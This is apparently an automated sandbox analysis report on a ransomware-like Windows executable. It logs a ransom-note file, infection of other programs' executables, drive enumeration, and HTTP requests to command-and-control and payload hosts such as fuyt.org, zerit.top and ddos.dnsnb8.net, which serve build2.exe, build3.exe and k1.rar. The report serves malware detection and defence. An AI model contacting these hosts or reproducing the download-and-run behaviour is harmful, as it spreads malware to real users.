          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\_readme.txtJump to behavior
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49702 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49726 version: TLS 1.2
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2520302187.000000000310F000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2509824074.000000000310F000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2521536533.00000000036C4000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2490534765.00000000036B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\&1 source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479446968.000000000316F000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2491022970.0000000003171000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479214046.0000000003157000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479352544.0000000003164000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2520543452.0000000003171000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\\ve\K source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000939000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\11\*jK06 source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2467331598.0000000003143000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\tuciyuvowafo82\vexeyokisi\modoyisi xub.pdb source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\Ik source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2509824074.0000000003129000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479214046.0000000003141000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479627588.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2490960191.0000000003141000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2520302187.0000000003129000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2466953934.000000000318E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\g source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2466953934.000000000318E000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2467451110.0000000003199000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ts\ source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2475180674.0000000003177000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2467011907.000000000317E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: d:\dbs\sh\odct\1105_210049_0\client\onedrive\Setup\Standalone\exe\obj\i386\OneDriveSetup.pdb source: wctDE6E.tmp.12.dr
          Source: Binary string: C:\tuciyuvowafo82\vexeyokisi\modoyisi xub.pdbh source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe

          Spreading

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00D129E2
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_00410160
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_0040F730
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,6_2_0040FB98
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D12B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00D12B8C
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://fuyt.org/test1/get.php
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 799
          Source: global trafficTCP traffic: 192.168.2.7:49703 -> 44.221.84.105:799
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: LIVECOMM-ASRespublikanskayastr3k6RU LIVECOMM-ASRespublikanskayastr3k6RU
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D11099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_00D11099
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zerit.top
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fuyt.org
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2402474005.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403535836.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403720773.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
          Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
          Source: global trafficDNS traffic detected: DNS query: fuyt.org
          Source: global trafficDNS traffic detected: DNS query: zerit.top
          Source: HhVfIB.exe, 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmp, HhVfIB.exe, 00000001.00000003.1251210820.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
          Source: V0100004.log.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: V0100004.log.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: V0100004.log.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
          Source: V0100004.log.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
          Source: V0100004.log.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: V0100004.log.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
          Source: V0100004.log.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: V0100004.log.12.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2Secure
          Source: V0100004.log.12.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
          Source: V0100004.log.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: V0100004.log.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: V0100004.log.12.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
          Source: HhVfIB.exe, 00000001.00000003.1304081456.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, HhVfIB.exe, 00000001.00000002.1504589616.0000000002A1A000.00000004.00000010.00020000.00000000.sdmp, HhVfIB.exe, 00000001.00000002.1503916634.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
          Source: HhVfIB.exe, 00000001.00000002.1503916634.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
          Source: HhVfIB.exe, 00000001.00000002.1503916634.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarPU
          Source: HhVfIB.exe, 00000001.00000002.1503916634.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, HhVfIB.exe, 00000001.00000003.1304081456.0000000000E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarf
          Source: HhVfIB.exe, 00000001.00000002.1504589616.0000000002A1A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
          Source: HhVfIB.exe, 00000001.00000003.1304081456.0000000000E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/3C8DAB0A318E3BBE55D6418C454BF200N
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/files/1/build3.exe
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/files/1/build3.exe$run
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/files/1/build3.exe$runOm
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/files/1/build3.exe$runrueDm
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000003.1355780671.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/test1/get.php
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF2005
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200v
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200x
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuyt.org/test1/get.phpp
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: V0100004.log.12.drString found in binary or memory: http://ocsp.digi
          Source: V0100004.log.12.drString found in binary or memory: http://ocsp.digicert.com0
          Source: V0100004.log.12.drString found in binary or memory: http://ocsp.digicert.com0H
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoftp
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2402102192.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
          Source: V0100004.log.12.drString found in binary or memory: http://www.digicert.com/CPS0~
